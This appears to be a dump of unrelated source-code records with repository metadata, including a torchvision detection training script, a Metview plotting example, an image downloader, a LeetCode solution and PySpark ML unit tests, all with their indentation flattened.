parser.add_argument(
"--data-augmentation", default="hflip", type=str, help="data augmentation policy (default: hflip)"
)
parser.add_argument(
"--sync-bn",
dest="sync_bn",
help="Use sync batch norm",
action="store_true",
)
parser.add_argument(
"--test-only",
dest="test_only",
help="Only test the model",
action="store_true",
)
parser.add_argument(
"--pretrained",
dest="pretrained",
help="Use pre-trained models from the modelzoo",
action="store_true",
)
# distributed training parameters
parser.add_argument("--world-size", default=1, type=int, help="number of distributed processes")
parser.add_argument("--dist-url", default="env://", type=str, help="url used to set up distributed training")
# Prototype models only
parser.add_argument("--weights", default=None, type=str, help="the weights enum name to load")
return parser
def main(args):
if args.weights and PM is None:
raise ImportError("The prototype module couldn't be found. Please install the latest torchvision nightly.")
if args.output_dir:
utils.mkdir(args.output_dir)
utils.init_distributed_mode(args)
print(args)
device = torch.device(args.device)
# Data loading code
print("Loading data")
dataset, num_classes = get_dataset(args.dataset, "train", get_transform(True, args), args.data_path)
dataset_test, _ = get_dataset(args.dataset, "val", get_transform(False, args), args.data_path)
print("Creating data loaders")
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(dataset)
test_sampler = torch.utils.data.distributed.DistributedSampler(dataset_test)
else:
train_sampler = torch.utils.data.RandomSampler(dataset)
test_sampler = torch.utils.data.SequentialSampler(dataset_test)
if args.aspect_ratio_group_factor >= 0:
group_ids = create_aspect_ratio_groups(dataset, k=args.aspect_ratio_group_factor)
train_batch_sampler = GroupedBatchSampler(train_sampler, group_ids, args.batch_size)
else:
train_batch_sampler = torch.utils.data.BatchSampler(train_sampler, args.batch_size, drop_last=True)
data_loader = torch.utils.data.DataLoader(
dataset, batch_sampler=train_batch_sampler, num_workers=args.workers, collate_fn=utils.collate_fn
)
data_loader_test = torch.utils.data.DataLoader(
dataset_test, batch_size=1, sampler=test_sampler, num_workers=args.workers, collate_fn=utils.collate_fn
)
print("Creating model")
kwargs = {"trainable_backbone_layers": args.trainable_backbone_layers}
if "rcnn" in args.model:
if args.rpn_score_thresh is not None:
kwargs["rpn_score_thresh"] = args.rpn_score_thresh
if not args.weights:
model = torchvision.models.detection.__dict__[args.model](
pretrained=args.pretrained, num_classes=num_classes, **kwargs
)
else:
model = PM.detection.__dict__[args.model](weights=args.weights, num_classes=num_classes, **kwargs)
model.to(device)
if args.distributed and args.sync_bn:
model = torch.nn.SyncBatchNorm.convert_sync_batchnorm(model)
model_without_ddp = model
if args.distributed:
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
model_without_ddp = model.module
params = [p for p in model.parameters() if p.requires_grad]
optimizer = torch.optim.SGD(params, lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)
args.lr_scheduler = args.lr_scheduler.lower()
if args.lr_scheduler == "multisteplr":
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(optimizer, milestones=args.lr_steps, gamma=args.lr_gamma)
elif args.lr_scheduler == "cosineannealinglr":
lr_scheduler = torch.optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs)
else:
raise RuntimeError(
f"Invalid lr scheduler '{args.lr_scheduler}'. Only MultiStepLR and CosineAnnealingLR are supported."
)
if args.resume:
checkpoint = torch.load(args.resume, map_location="cpu")
model_without_ddp.load_state_dict(checkpoint["model"])
optimizer.load_state_dict(checkpoint["optimizer"])
lr_scheduler.load_state_dict(checkpoint["lr_scheduler"])
args.start_epoch = checkpoint["epoch"] + 1
if args.test_only:
evaluate(model, data_loader_test, device=device)
return
print("Start training")
start_time = time.time()
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
train_one_epoch(model, optimizer, data_loader, device, epoch, args.print_freq)
lr_scheduler.step()
if args.output_dir:
checkpoint = {
"model": model_without_ddp.state_dict(),
"optimizer": optimizer.state_dict(),
"lr_scheduler": lr_scheduler.state_dict(),
"args": args,
"epoch": epoch,
}
utils.save_on_master(checkpoint, os.path.join(args.output_dir, f"model_{epoch}.pth"))
utils.save_on_master(checkpoint, os.path.join(args.output_dir, "checkpoint.pth"))
# evaluate after every epoch
evaluate(model, data_loader_test, device=device)
total_time = time.time() - start_time
total_time_str = str(datetime.timedelta(seconds=int(total_time)))
print(f"Training time {total_time_str}")
if __name__ == "__main__":
args = get_args_parser().parse_args()
main(args)
| 39.866412
| 118
| 0.688368
|
3519c9b5687d86196b96625d707333e1ce2cf060
| 3,207
|
py
|
Python
|
docs/gallery/legend3.py
|
ecmwf/metview-docs
|
cfde15232834c2d2a8393e7e6ba67ba95acd51e0
|
[
"Apache-2.0"
] | 2
|
2021-07-19T09:02:33.000Z
|
2021-09-01T14:29:50.000Z
|
docs/gallery/legend3.py
|
ecmwf/metview-docs
|
cfde15232834c2d2a8393e7e6ba67ba95acd51e0
|
[
"Apache-2.0"
] | 1
|
2021-10-14T11:53:08.000Z
|
2021-12-01T10:07:34.000Z
|
docs/gallery/legend3.py
|
ecmwf/metview-docs
|
cfde15232834c2d2a8393e7e6ba67ba95acd51e0
|
[
"Apache-2.0"
] | null | null | null |
"""
GRIB - Histogram Legend
"""
# (C) Copyright 2017- ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
#
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation
# nor does it submit to any jurisdiction.
#
# ------------------------------------------------------------------
# Demonstrates how to combine two fields into a single plot
# using contour and shade. A histogram legend is used for one
# of the fields.
# ------------------------------------------------------------------
import metview as mv
# read the input grib temperature
filename = "t850.grb"
if mv.exist(filename):
my_data1 = mv.read(filename)
else:
my_data1 = mv.gallery.load_dataset(filename)
# read the input grib geopotential
filename = "z500.grb"
if mv.exist(filename):
my_data2 = mv.read(filename)
else:
my_data2 = mv.gallery.load_dataset(filename)
# set up the geographical view
my_view = mv.geoview(
map_area_definition="CORNERS",
map_projection="POLAR_STEREOGRAPHIC",
area=[21.51, -37.27, 51.28, 65.00],
)
# set up a shade contour with legend for the temperature field
my_contour1 = mv.mcont(
contour_level_selection_type="LEVEL_LIST",
contour_level_list=[-10.0, -8.0, -6.0, -4.0, -2.0, 0.0, 2.0, 4.0, 6.0, 8.0, 10.0],
contour="OFF",
contour_label="OFF",
contour_hilo="OFF",
legend="ON",
contour_shade="ON",
contour_shade_method="AREA_FILL",
contour_shade_colour_direction="CLOCKWISE",
contour_shade_max_level_colour="RED",
contour_shade_min_level_colour="BLUE",
)
# set up a black contour line for the geopotential field
my_contour2 = mv.mcont(
contour_level_selection_type="INTERVAL",
contour_line_colour="BLACK",
contour_line_thickness=1,
contour_hilo_height=0.25,
contour_interval=5.00,
contour_hilo="ON",
contour_hilo_quality="HIGH",
contour_highlight_colour="BLACK",
contour_highlight_thickness=2,
contour_label="OFF",
legend="OFF",
)
# set up the coastlines
my_coast = mv.mcoast(
map_coastline_resolution="HIGH",
map_grid_colour="CHARCOAL",
map_grid="ON",
map_coastline_colour="CHARCOAL",
)
# set up the title
my_title = mv.mtext(
text_font_size=0.60,
text_lines=["Positional and histogram legend", "", "", "", "", "", ""],
text_justification="LEFT",
text_colour="CHARCOAL",
)
# set up an histogram legend for the temperature field
my_legend = mv.mlegend(
legend_box_mode="POSITIONAL",
legend_box_x_position=1.00,
legend_box_x_length=27.00,
legend_box_y_position=16.00,
legend_box_y_length=3.00,
legend_display_type="HISTOGRAM",
legend_histogram_max_value="ON",
legend_label_frequency=1,
legend_text_font_size=0.40,
legend_text_colour="BLACK",
legend_title="ON",
legend_title_text="Temperature at 850 hPa",
)
# define the output plot file
mv.setoutput(mv.pdf_output(output_name="legend3"))
# plot the map
mv.plot(
my_view, my_data1, my_contour1, my_data2, my_contour2, my_coast, my_title, my_legend
)
| 28.131579
| 88
| 0.688494
|
2bc392b583d6de2219c23b663efe981122f68738
| 1,880
|
py
|
Python
|
helpers/file_saver.py
|
jameslafa/500px-fav-downloader
|
08a6bd46fc45aefed4630d0bffea8d410162f273
|
[
"MIT"
] | 1
|
2016-02-08T22:13:37.000Z
|
2016-02-08T22:13:37.000Z
|
helpers/file_saver.py
|
jameslafa/500px-fav-downloader
|
08a6bd46fc45aefed4630d0bffea8d410162f273
|
[
"MIT"
] | null | null | null |
helpers/file_saver.py
|
jameslafa/500px-fav-downloader
|
08a6bd46fc45aefed4630d0bffea8d410162f273
|
[
"MIT"
] | null | null | null |
import os
import requests
class FileSaver:
"""
Save a file to different storages
"""
# For the moment we only support disk, dropbox will come soon
SUPPORTED_STORAGE_TYPES = ['disk']
def __init__(self, storage_type, disk_storage_path=None):
"""
Build a FileSaver instance
:param storage_type: disk is the only available value for the moment
:param disk_storage_path: directory path where files will be saved
"""
# Validate the storage_type is supported
if storage_type not in self.SUPPORTED_STORAGE_TYPES:
raise AttributeError(str(storage_type) + ' is not a supported storage_type')
self.storage_type = storage_type
self.disk_storage_path = disk_storage_path
def save_image_from_url(self, url, photo_id):
"""
Download an image from an url and save it
:param url: url of the image to download
:param photo_id: id of the picture, used for the file name
:return:
"""
# Download file from url
r = requests.get(url, stream=True)
# If the response is OK
if r.status_code == 200:
if self.storage_type == 'disk':
# Create the directory on the disk if it doesn't exists
if not os.path.isdir(self.disk_storage_path):
os.mkdir(self.disk_storage_path)
# Define file_path where the file will be stored
# TODO: extension shouldn't be hardcoded
file_path = os.path.join(self.disk_storage_path, str(photo_id) + '.jpg')
# Save image on the disk
with open(file_path, 'wb') as f:
for chunk in r.iter_content(1024):
f.write(chunk)
else:
raise RuntimeError("Couldn't download the image")
| 32.413793
| 88
| 0.604255
|
9f436b2e5272a9d4785046874eae26fcb7f688dc
| 1,239
|
py
|
Python
|
LeetCodeSolutions/python/127_Word_Ladder.py
|
ChuanleiGuo/AlgorithmsPlayground
|
90b6287b742c8bfd3797540c408d679be2821a40
|
[
"MIT"
] | 1
|
2017-03-27T13:38:37.000Z
|
2017-03-27T13:38:37.000Z
|
LeetCodeSolutions/python/127_Word_Ladder.py
|
ChuanleiGuo/AlgorithmsPlayground
|
90b6287b742c8bfd3797540c408d679be2821a40
|
[
"MIT"
] | null | null | null |
LeetCodeSolutions/python/127_Word_Ladder.py
|
ChuanleiGuo/AlgorithmsPlayground
|
90b6287b742c8bfd3797540c408d679be2821a40
|
[
"MIT"
] | null | null | null |
import string
from collections import Set
class Solution(object):
def ladderLength(self, beginWord, endWord, wordList):
"""
:type beginWord: str
:type endWord: str
:type wordList: Set[str]
:rtype: int
"""
word_list = set(wordList)
if beginWord in word_list:
word_list.remove(beginWord)
word_list.add(endWord)
letters = str(string.lowercase)
queue = [beginWord]
level = 0
while len(queue) != 0:
size = len(queue)
while size > 0:
size -= 1
word = queue.pop(0)
if word == endWord:
return level + 1
chars = list(word)
for i in range(len(word)):
for letter in letters:
if letter != word[i]:
chars[i] = letter
new_word = "".join(chars)
if new_word in word_list:
word_list.remove(new_word)
queue.append(new_word)
chars[i] = word[i]
level += 1
return 0
| 26.361702
| 58
| 0.436642
|
918edb56a95aa7badf30c97e83c11dfff6a26eeb
| 49
|
py
|
Python
|
tests/General/Varnametest.py
|
soodsidd/instpyr
|
138d0a8164dc388187fde58329b9ff770af77af4
|
[
"MIT"
] | null | null | null |
tests/General/Varnametest.py
|
soodsidd/instpyr
|
138d0a8164dc388187fde58329b9ff770af77af4
|
[
"MIT"
] | null | null | null |
tests/General/Varnametest.py
|
soodsidd/instpyr
|
138d0a8164dc388187fde58329b9ff770af77af4
|
[
"MIT"
] | null | null | null |
a=1
print(nameof(a))
print(eval('a+5'))
print(a)
| 9.8
| 18
| 0.632653
|
f19ce2de858d7815208f1d4ae67ad65602e0d979
| 436
|
py
|
Python
|
microcosm_sagemaker/tests/app_hooks/evaluate/config.py
|
globality-corp/microcosm-sagemaker
|
c112ea2c1f5c40c1973c292b73ca0fadbf461280
|
[
"Apache-2.0"
] | null | null | null |
microcosm_sagemaker/tests/app_hooks/evaluate/config.py
|
globality-corp/microcosm-sagemaker
|
c112ea2c1f5c40c1973c292b73ca0fadbf461280
|
[
"Apache-2.0"
] | 15
|
2019-04-22T19:46:32.000Z
|
2022-02-11T17:31:43.000Z
|
microcosm_sagemaker/tests/app_hooks/evaluate/config.py
|
globality-corp/microcosm-sagemaker
|
c112ea2c1f5c40c1973c292b73ca0fadbf461280
|
[
"Apache-2.0"
] | null | null | null |
"""
Configure the application.
"""
from microcosm.config.model import Configuration
from microcosm.metadata import Metadata
def load_default_config(metadata: Metadata) -> Configuration:
"""
Construct application default configuration.
There should be very little here.
"""
config = Configuration(
active_bundle="compound_bundle",
active_evaluation="simple_evaluation",
)
return config
| 18.956522
| 61
| 0.715596
|
a7a9868baccb301c588101e1d710e18a8985aeae
| 37,245
|
py
|
Python
|
python/pyspark/ml/tests.py
|
ruby-/spark-parent_2.11
|
5f5e9583f705bcdbf73321e14e02b539dc3f08b1
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
python/pyspark/ml/tests.py
|
ruby-/spark-parent_2.11
|
5f5e9583f705bcdbf73321e14e02b539dc3f08b1
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
python/pyspark/ml/tests.py
|
ruby-/spark-parent_2.11
|
5f5e9583f705bcdbf73321e14e02b539dc3f08b1
|
[
"BSD-3-Clause-Open-MPI",
"PSF-2.0",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"MIT-0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause-Clear",
"BSD-3-Clause"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Unit tests for Spark ML Python APIs.
"""
import array
import sys
if sys.version > '3':
xrange = range
basestring = str
try:
import xmlrunner
except ImportError:
xmlrunner = None
if sys.version_info[:2] <= (2, 6):
try:
import unittest2 as unittest
except ImportError:
sys.stderr.write('Please install unittest2 to test with Python 2.6 or earlier')
sys.exit(1)
else:
import unittest
from shutil import rmtree
import tempfile
import numpy as np
from pyspark.ml import Estimator, Model, Pipeline, PipelineModel, Transformer
from pyspark.ml.classification import LogisticRegression, DecisionTreeClassifier, OneVsRest
from pyspark.ml.clustering import KMeans
from pyspark.ml.evaluation import BinaryClassificationEvaluator, RegressionEvaluator
from pyspark.ml.feature import *
from pyspark.ml.param import Param, Params, TypeConverters
from pyspark.ml.param.shared import HasMaxIter, HasInputCol, HasSeed
from pyspark.ml.regression import LinearRegression, DecisionTreeRegressor
from pyspark.ml.tuning import *
from pyspark.ml.util import keyword_only
from pyspark.ml.util import MLWritable, MLWriter
from pyspark.ml.wrapper import JavaParams
from pyspark.mllib.linalg import Vectors, DenseVector, SparseVector
from pyspark.sql import DataFrame, SQLContext, Row
from pyspark.sql.functions import rand
from pyspark.tests import ReusedPySparkTestCase as PySparkTestCase
class MockDataset(DataFrame):
def __init__(self):
self.index = 0
class HasFake(Params):
def __init__(self):
super(HasFake, self).__init__()
self.fake = Param(self, "fake", "fake param")
def getFake(self):
return self.getOrDefault(self.fake)
class MockTransformer(Transformer, HasFake):
def __init__(self):
super(MockTransformer, self).__init__()
self.dataset_index = None
def _transform(self, dataset):
self.dataset_index = dataset.index
dataset.index += 1
return dataset
class MockEstimator(Estimator, HasFake):
def __init__(self):
super(MockEstimator, self).__init__()
self.dataset_index = None
def _fit(self, dataset):
self.dataset_index = dataset.index
model = MockModel()
self._copyValues(model)
return model
class MockModel(MockTransformer, Model, HasFake):
pass
class ParamTypeConversionTests(PySparkTestCase):
"""
Test that param type conversion happens.
"""
def test_int(self):
lr = LogisticRegression(maxIter=5.0)
self.assertEqual(lr.getMaxIter(), 5)
self.assertTrue(type(lr.getMaxIter()) == int)
self.assertRaises(TypeError, lambda: LogisticRegression(maxIter="notAnInt"))
self.assertRaises(TypeError, lambda: LogisticRegression(maxIter=5.1))
def test_float(self):
lr = LogisticRegression(tol=1)
self.assertEqual(lr.getTol(), 1.0)
self.assertTrue(type(lr.getTol()) == float)
self.assertRaises(TypeError, lambda: LogisticRegression(tol="notAFloat"))
def test_vector(self):
ewp = ElementwiseProduct(scalingVec=[1, 3])
self.assertEqual(ewp.getScalingVec(), DenseVector([1.0, 3.0]))
ewp = ElementwiseProduct(scalingVec=np.array([1.2, 3.4]))
self.assertEqual(ewp.getScalingVec(), DenseVector([1.2, 3.4]))
self.assertRaises(TypeError, lambda: ElementwiseProduct(scalingVec=["a", "b"]))
def test_list(self):
l = [0, 1]
for lst_like in [l, np.array(l), DenseVector(l), SparseVector(len(l), range(len(l)), l),
array.array('l', l), xrange(2), tuple(l)]:
converted = TypeConverters.toList(lst_like)
self.assertEqual(type(converted), list)
self.assertListEqual(converted, l)
def test_list_int(self):
for indices in [[1.0, 2.0], np.array([1.0, 2.0]), DenseVector([1.0, 2.0]),
SparseVector(2, {0: 1.0, 1: 2.0}), xrange(1, 3), (1.0, 2.0),
array.array('d', [1.0, 2.0])]:
vs = VectorSlicer(indices=indices)
self.assertListEqual(vs.getIndices(), [1, 2])
self.assertTrue(all([type(v) == int for v in vs.getIndices()]))
self.assertRaises(TypeError, lambda: VectorSlicer(indices=["a", "b"]))
def test_list_float(self):
b = Bucketizer(splits=[1, 4])
self.assertEqual(b.getSplits(), [1.0, 4.0])
self.assertTrue(all([type(v) == float for v in b.getSplits()]))
self.assertRaises(TypeError, lambda: Bucketizer(splits=["a", 1.0]))
def test_list_string(self):
for labels in [np.array(['a', u'b']), ['a', u'b'], np.array(['a', 'b'])]:
idx_to_string = IndexToString(labels=labels)
self.assertListEqual(idx_to_string.getLabels(), ['a', 'b'])
self.assertRaises(TypeError, lambda: IndexToString(labels=['a', 2]))
def test_string(self):
lr = LogisticRegression()
for col in ['features', u'features', np.str_('features')]:
lr.setFeaturesCol(col)
self.assertEqual(lr.getFeaturesCol(), 'features')
self.assertRaises(TypeError, lambda: LogisticRegression(featuresCol=2.3))
def test_bool(self):
self.assertRaises(TypeError, lambda: LogisticRegression(fitIntercept=1))
self.assertRaises(TypeError, lambda: LogisticRegression(fitIntercept="false"))
class PipelineTests(PySparkTestCase):
def test_pipeline(self):
dataset = MockDataset()
estimator0 = MockEstimator()
transformer1 = MockTransformer()
estimator2 = MockEstimator()
transformer3 = MockTransformer()
pipeline = Pipeline(stages=[estimator0, transformer1, estimator2, transformer3])
pipeline_model = pipeline.fit(dataset, {estimator0.fake: 0, transformer1.fake: 1})
model0, transformer1, model2, transformer3 = pipeline_model.stages
self.assertEqual(0, model0.dataset_index)
self.assertEqual(0, model0.getFake())
self.assertEqual(1, transformer1.dataset_index)
self.assertEqual(1, transformer1.getFake())
self.assertEqual(2, dataset.index)
self.assertIsNone(model2.dataset_index, "The last model shouldn't be called in fit.")
self.assertIsNone(transformer3.dataset_index,
"The last transformer shouldn't be called in fit.")
dataset = pipeline_model.transform(dataset)
self.assertEqual(2, model0.dataset_index)
self.assertEqual(3, transformer1.dataset_index)
self.assertEqual(4, model2.dataset_index)
self.assertEqual(5, transformer3.dataset_index)
self.assertEqual(6, dataset.index)
class TestParams(HasMaxIter, HasInputCol, HasSeed):
"""
A subclass of Params mixed with HasMaxIter, HasInputCol and HasSeed.
"""
@keyword_only
def __init__(self, seed=None):
super(TestParams, self).__init__()
self._setDefault(maxIter=10)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, seed=None):
"""
setParams(self, seed=None)
Sets params for this test.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
class OtherTestParams(HasMaxIter, HasInputCol, HasSeed):
"""
A subclass of Params mixed with HasMaxIter, HasInputCol and HasSeed.
"""
@keyword_only
def __init__(self, seed=None):
super(OtherTestParams, self).__init__()
self._setDefault(maxIter=10)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, seed=None):
"""
setParams(self, seed=None)
Sets params for this test.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
class HasThrowableProperty(Params):
def __init__(self):
super(HasThrowableProperty, self).__init__()
self.p = Param(self, "none", "empty param")
@property
def test_property(self):
raise RuntimeError("Test property to raise error when invoked")
class ParamTests(PySparkTestCase):
def test_copy_new_parent(self):
testParams = TestParams()
# Copying an instantiated param should fail
with self.assertRaises(ValueError):
testParams.maxIter._copy_new_parent(testParams)
# Copying a dummy param should succeed
TestParams.maxIter._copy_new_parent(testParams)
maxIter = testParams.maxIter
self.assertEqual(maxIter.name, "maxIter")
self.assertEqual(maxIter.doc, "max number of iterations (>= 0).")
self.assertTrue(maxIter.parent == testParams.uid)
def test_param(self):
testParams = TestParams()
maxIter = testParams.maxIter
self.assertEqual(maxIter.name, "maxIter")
self.assertEqual(maxIter.doc, "max number of iterations (>= 0).")
self.assertTrue(maxIter.parent == testParams.uid)
def test_hasparam(self):
testParams = TestParams()
self.assertTrue(all([testParams.hasParam(p.name) for p in testParams.params]))
self.assertFalse(testParams.hasParam("notAParameter"))
def test_params(self):
testParams = TestParams()
maxIter = testParams.maxIter
inputCol = testParams.inputCol
seed = testParams.seed
params = testParams.params
self.assertEqual(params, [inputCol, maxIter, seed])
self.assertTrue(testParams.hasParam(maxIter.name))
self.assertTrue(testParams.hasDefault(maxIter))
self.assertFalse(testParams.isSet(maxIter))
self.assertTrue(testParams.isDefined(maxIter))
self.assertEqual(testParams.getMaxIter(), 10)
testParams.setMaxIter(100)
self.assertTrue(testParams.isSet(maxIter))
self.assertEqual(testParams.getMaxIter(), 100)
self.assertTrue(testParams.hasParam(inputCol.name))
self.assertFalse(testParams.hasDefault(inputCol))
self.assertFalse(testParams.isSet(inputCol))
self.assertFalse(testParams.isDefined(inputCol))
with self.assertRaises(KeyError):
testParams.getInputCol()
# Since the default is normally random, set it to a known number for debug str
testParams._setDefault(seed=41)
testParams.setSeed(43)
self.assertEqual(
testParams.explainParams(),
"\n".join(["inputCol: input column name. (undefined)",
"maxIter: max number of iterations (>= 0). (default: 10, current: 100)",
"seed: random seed. (default: 41, current: 43)"]))
def test_kmeans_param(self):
algo = KMeans()
self.assertEqual(algo.getInitMode(), "k-means||")
algo.setK(10)
self.assertEqual(algo.getK(), 10)
algo.setInitSteps(10)
self.assertEqual(algo.getInitSteps(), 10)
def test_hasseed(self):
noSeedSpecd = TestParams()
withSeedSpecd = TestParams(seed=42)
other = OtherTestParams()
# Check that we no longer use 42 as the magic number
self.assertNotEqual(noSeedSpecd.getSeed(), 42)
origSeed = noSeedSpecd.getSeed()
# Check that we only compute the seed once
self.assertEqual(noSeedSpecd.getSeed(), origSeed)
# Check that a specified seed is honored
self.assertEqual(withSeedSpecd.getSeed(), 42)
# Check that a different class has a different seed
self.assertNotEqual(other.getSeed(), noSeedSpecd.getSeed())
def test_param_property_error(self):
param_store = HasThrowableProperty()
self.assertRaises(RuntimeError, lambda: param_store.test_property)
params = param_store.params # should not invoke the property 'test_property'
self.assertEqual(len(params), 1)
class FeatureTests(PySparkTestCase):
def test_binarizer(self):
b0 = Binarizer()
self.assertListEqual(b0.params, [b0.inputCol, b0.outputCol, b0.threshold])
self.assertTrue(all([~b0.isSet(p) for p in b0.params]))
self.assertTrue(b0.hasDefault(b0.threshold))
self.assertEqual(b0.getThreshold(), 0.0)
b0.setParams(inputCol="input", outputCol="output").setThreshold(1.0)
self.assertTrue(all([b0.isSet(p) for p in b0.params]))
self.assertEqual(b0.getThreshold(), 1.0)
self.assertEqual(b0.getInputCol(), "input")
self.assertEqual(b0.getOutputCol(), "output")
b0c = b0.copy({b0.threshold: 2.0})
self.assertEqual(b0c.uid, b0.uid)
self.assertListEqual(b0c.params, b0.params)
self.assertEqual(b0c.getThreshold(), 2.0)
b1 = Binarizer(threshold=2.0, inputCol="input", outputCol="output")
self.assertNotEqual(b1.uid, b0.uid)
self.assertEqual(b1.getThreshold(), 2.0)
self.assertEqual(b1.getInputCol(), "input")
self.assertEqual(b1.getOutputCol(), "output")
def test_idf(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(DenseVector([1.0, 2.0]),),
(DenseVector([0.0, 1.0]),),
(DenseVector([3.0, 0.2]),)], ["tf"])
idf0 = IDF(inputCol="tf")
self.assertListEqual(idf0.params, [idf0.inputCol, idf0.minDocFreq, idf0.outputCol])
idf0m = idf0.fit(dataset, {idf0.outputCol: "idf"})
self.assertEqual(idf0m.uid, idf0.uid,
"Model should inherit the UID from its parent estimator.")
output = idf0m.transform(dataset)
self.assertIsNotNone(output.head().idf)
def test_ngram(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
Row(input=["a", "b", "c", "d", "e"])])
ngram0 = NGram(n=4, inputCol="input", outputCol="output")
self.assertEqual(ngram0.getN(), 4)
self.assertEqual(ngram0.getInputCol(), "input")
self.assertEqual(ngram0.getOutputCol(), "output")
transformedDF = ngram0.transform(dataset)
self.assertEqual(transformedDF.head().output, ["a b c d", "b c d e"])
def test_stopwordsremover(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([Row(input=["a", "panda"])])
stopWordRemover = StopWordsRemover(inputCol="input", outputCol="output")
# Default
self.assertEqual(stopWordRemover.getInputCol(), "input")
transformedDF = stopWordRemover.transform(dataset)
self.assertEqual(transformedDF.head().output, ["panda"])
self.assertEqual(type(stopWordRemover.getStopWords()), list)
self.assertTrue(isinstance(stopWordRemover.getStopWords()[0], basestring))
# Custom
stopwords = ["panda"]
stopWordRemover.setStopWords(stopwords)
self.assertEqual(stopWordRemover.getInputCol(), "input")
self.assertEqual(stopWordRemover.getStopWords(), stopwords)
transformedDF = stopWordRemover.transform(dataset)
self.assertEqual(transformedDF.head().output, ["a"])
def test_count_vectorizer_with_binary(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(0, "a a a b b c".split(' '), SparseVector(3, {0: 1.0, 1: 1.0, 2: 1.0}),),
(1, "a a".split(' '), SparseVector(3, {0: 1.0}),),
(2, "a b".split(' '), SparseVector(3, {0: 1.0, 1: 1.0}),),
(3, "c".split(' '), SparseVector(3, {2: 1.0}),)], ["id", "words", "expected"])
cv = CountVectorizer(binary=True, inputCol="words", outputCol="features")
model = cv.fit(dataset)
transformedList = model.transform(dataset).select("features", "expected").collect()
for r in transformedList:
feature, expected = r
self.assertEqual(feature, expected)
class HasInducedError(Params):
def __init__(self):
super(HasInducedError, self).__init__()
self.inducedError = Param(self, "inducedError",
"Uniformly-distributed error added to feature")
def getInducedError(self):
return self.getOrDefault(self.inducedError)
class InducedErrorModel(Model, HasInducedError):
def __init__(self):
super(InducedErrorModel, self).__init__()
def _transform(self, dataset):
return dataset.withColumn("prediction",
dataset.feature + (rand(0) * self.getInducedError()))
class InducedErrorEstimator(Estimator, HasInducedError):
def __init__(self, inducedError=1.0):
super(InducedErrorEstimator, self).__init__()
self._set(inducedError=inducedError)
def _fit(self, dataset):
model = InducedErrorModel()
self._copyValues(model)
return model
class CrossValidatorTests(PySparkTestCase):
def test_fit_minimize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="rmse")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
cv = CrossValidator(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
cvModel = cv.fit(dataset)
bestModel = cvModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(0.0, bestModelMetric, "Best model has RMSE of 0")
def test_fit_maximize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="r2")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
cv = CrossValidator(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
cvModel = cv.fit(dataset)
bestModel = cvModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(1.0, bestModelMetric, "Best model has R-squared of 1")
def test_save_load(self):
temp_path = tempfile.mkdtemp()
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame(
[(Vectors.dense([0.0]), 0.0),
(Vectors.dense([0.4]), 1.0),
(Vectors.dense([0.5]), 0.0),
(Vectors.dense([0.6]), 1.0),
(Vectors.dense([1.0]), 1.0)] * 10,
["features", "label"])
lr = LogisticRegression()
grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
evaluator = BinaryClassificationEvaluator()
cv = CrossValidator(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator)
